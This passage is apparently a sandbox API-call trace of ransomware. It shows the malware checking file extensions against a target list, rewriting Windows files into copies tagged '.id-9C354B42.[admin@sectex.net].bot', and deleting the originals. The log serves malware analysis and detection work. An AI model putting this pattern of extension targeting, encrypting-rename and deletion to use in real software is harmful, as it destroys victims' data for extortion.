	[0047.931] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.931] lstrlenW (lpString=".bz2") returned 4
	[0047.931] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.931] lstrlenW (lpString=".7z") returned 3
	[0047.931] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString=".dbf") returned 4
	[0047.931] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString=".1cd") returned 4
	[0047.931] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString=".jpg") returned 4
	[0047.931] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString=".doc") returned 4
	[0047.932] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString=".docx") returned 5
	[0047.932] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.932] lstrlenW (lpString=".pdf") returned 4
	[0047.932] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString=".xls") returned 4
	[0047.932] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.932] lstrlenW (lpString=".xlsx") returned 5
	[0047.932] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.932] lstrlenW (lpString=".ppt") returned 4
	[0047.932] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString=".zip") returned 4
	[0047.932] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.932] lstrlenW (lpString=".rar") returned 4
	[0047.932] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.932] lstrlenW (lpString=".bz2") returned 4
	[0047.932] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString=".7z") returned 3
	[0047.932] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString=".dbf") returned 4
	[0047.932] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString=".1cd") returned 4
	[0047.932] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.932] lstrlenW (lpString=".jpg") returned 4
	[0047.932] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.933] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.933] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.933] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=4991) returned 1
	[0047.933] CloseHandle (hObject=0x1fc) returned 1
	[0047.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 0x20
	[0047.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.933] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.933] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.034] GetLastError () returned 0x0
	[0048.034] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x137f, lpOverlapped=0x0) returned 1
	[0048.071] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1380, lpOverlapped=0x0) returned 1
	[0048.072] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.072] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0048.073] SetEndOfFile (hFile=0x1a8) returned 1
	[0048.073] CloseHandle (hObject=0x1a8) returned 1
	[0048.073] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.073] SetEndOfFile (hFile=0x1fc) returned 1
	[0048.074] CloseHandle (hObject=0x1fc) returned 1
	[0048.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.074] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1
	[0048.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.074] lstrlenW (lpString=".doc") returned 4
	[0048.074] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.074] lstrlenW (lpString=".docx") returned 5
	[0048.074] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.074] lstrlenW (lpString=".pdf") returned 4
	[0048.074] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.074] lstrlenW (lpString=".xls") returned 4
	[0048.074] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.074] lstrlenW (lpString=".xlsx") returned 5
	[0048.074] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.074] lstrlenW (lpString=".ppt") returned 4
	[0048.075] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString=".zip") returned 4
	[0048.075] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString=".rar") returned 4
	[0048.075] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString=".bz2") returned 4
	[0048.075] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.075] lstrlenW (lpString=".7z") returned 3
	[0048.075] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString=".dbf") returned 4
	[0048.075] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString=".1cd") returned 4
	[0048.075] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString=".jpg") returned 4
	[0048.075] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.075] lstrlenW (lpString=".doc") returned 4
	[0048.075] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.075] lstrlenW (lpString=".docx") returned 5
	[0048.075] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.075] lstrlenW (lpString=".pdf") returned 4
	[0048.075] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString=".xls") returned 4
	[0048.075] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString=".xlsx") returned 5
	[0048.075] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.075] lstrlenW (lpString=".ppt") returned 4
	[0048.075] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.076] lstrlenW (lpString=".zip") returned 4
	[0048.076] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.076] lstrlenW (lpString=".rar") returned 4
	[0048.076] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.076] lstrlenW (lpString=".bz2") returned 4
	[0048.076] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.076] lstrlenW (lpString=".7z") returned 3
	[0048.076] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.076] lstrlenW (lpString=".dbf") returned 4
	[0048.076] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.076] lstrlenW (lpString=".1cd") returned 4
	[0048.076] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76
	[0048.076] lstrlenW (lpString=".jpg") returned 4
	[0048.076] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.076] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.076] lstrlenW (lpString="VBENDF98.CHM") returned 12
	[0048.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0048.861] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=72031) returned 1
	[0048.873] CloseHandle (hObject=0x194) returned 1
	[0048.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 0x20
	[0048.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.895] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.895] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.896] GetLastError () returned 0x0
	[0048.896] ReadFile (in: hFile=0x1d0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1195f, lpOverlapped=0x0) returned 1
	[0048.900] WriteFile (in: hFile=0x184, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x11960, lpOverlapped=0x0) returned 1
	[0048.902] ReadFile (in: hFile=0x1d0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.902] WriteFile (in: hFile=0x184, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0048.902] SetEndOfFile (hFile=0x184) returned 1
	[0048.902] CloseHandle (hObject=0x184) returned 1
	[0048.902] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.902] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.903] CloseHandle (hObject=0x1d0) returned 1
	[0048.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.904] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1
	[0048.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.904] lstrlenW (lpString=".doc") returned 4
	[0048.904] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.904] lstrlenW (lpString=".docx") returned 5
	[0048.904] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1
	[0048.904] lstrlenW (lpString=".pdf") returned 4
	[0048.904] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.904] lstrlenW (lpString=".xls") returned 4
	[0048.904] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.904] lstrlenW (lpString=".xlsx") returned 5
	[0048.904] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1
	[0048.904] lstrlenW (lpString=".ppt") returned 4
	[0048.904] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.904] lstrlenW (lpString=".zip") returned 4
	[0048.904] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.904] lstrlenW (lpString=".rar") returned 4
	[0048.905] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".bz2") returned 4
	[0048.905] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.905] lstrlenW (lpString=".7z") returned 3
	[0048.905] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString=".dbf") returned 4
	[0048.905] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString=".1cd") returned 4
	[0048.905] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString=".jpg") returned 4
	[0048.905] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString=".doc") returned 4
	[0048.905] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".docx") returned 5
	[0048.905] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1
	[0048.905] lstrlenW (lpString=".pdf") returned 4
	[0048.905] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".xls") returned 4
	[0048.905] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".xlsx") returned 5
	[0048.905] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1
	[0048.905] lstrlenW (lpString=".ppt") returned 4
	[0048.905] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.905] lstrlenW (lpString=".zip") returned 4
	[0048.905] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".rar") returned 4
	[0048.905] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.905] lstrlenW (lpString=".bz2") returned 4
	[0048.905] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.906] lstrlenW (lpString=".7z") returned 3
	[0048.906] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.906] lstrlenW (lpString=".dbf") returned 4
	[0048.906] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.906] lstrlenW (lpString=".1cd") returned 4
	[0048.906] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73
	[0048.906] lstrlenW (lpString=".jpg") returned 4
	[0048.906] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.906] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0048.906] lstrlenW (lpString="adcvbs.inc") returned 10
	[0048.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.136] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=623) returned 1
	[0049.136] CloseHandle (hObject=0x1f0) returned 1
	[0049.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20
	[0049.137] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.137] lstrlenW (lpString=".doc") returned 4
	[0049.137] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.137] lstrlenW (lpString=".docx") returned 5
	[0049.137] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.137] lstrlenW (lpString=".pdf") returned 4
	[0049.137] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.137] lstrlenW (lpString=".xls") returned 4
	[0049.137] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.137] lstrlenW (lpString=".xlsx") returned 5
	[0049.137] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.137] lstrlenW (lpString=".ppt") returned 4
	[0049.137] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.137] lstrlenW (lpString=".zip") returned 4
	[0049.137] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.137] lstrlenW (lpString=".rar") returned 4
	[0049.137] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.137] lstrlenW (lpString=".bz2") returned 4
	[0049.137] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.137] lstrlenW (lpString=".7z") returned 3
	[0049.137] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.137] lstrlenW (lpString=".dbf") returned 4
	[0049.137] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".1cd") returned 4
	[0049.138] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".jpg") returned 4
	[0049.138] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".doc") returned 4
	[0049.138] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.138] lstrlenW (lpString=".docx") returned 5
	[0049.138] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.138] lstrlenW (lpString=".pdf") returned 4
	[0049.138] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString=".xls") returned 4
	[0049.138] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString=".xlsx") returned 5
	[0049.138] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.138] lstrlenW (lpString=".ppt") returned 4
	[0049.138] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53
	[0049.138] lstrlenW (lpString=".zip") returned 4
	[0049.138] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString=".rar") returned 4
	[0049.138] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.138] lstrlenW (lpString=".bz2") returned 4
	[0049.138] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.138] lstrlenW (lpString=".7z") returned 3
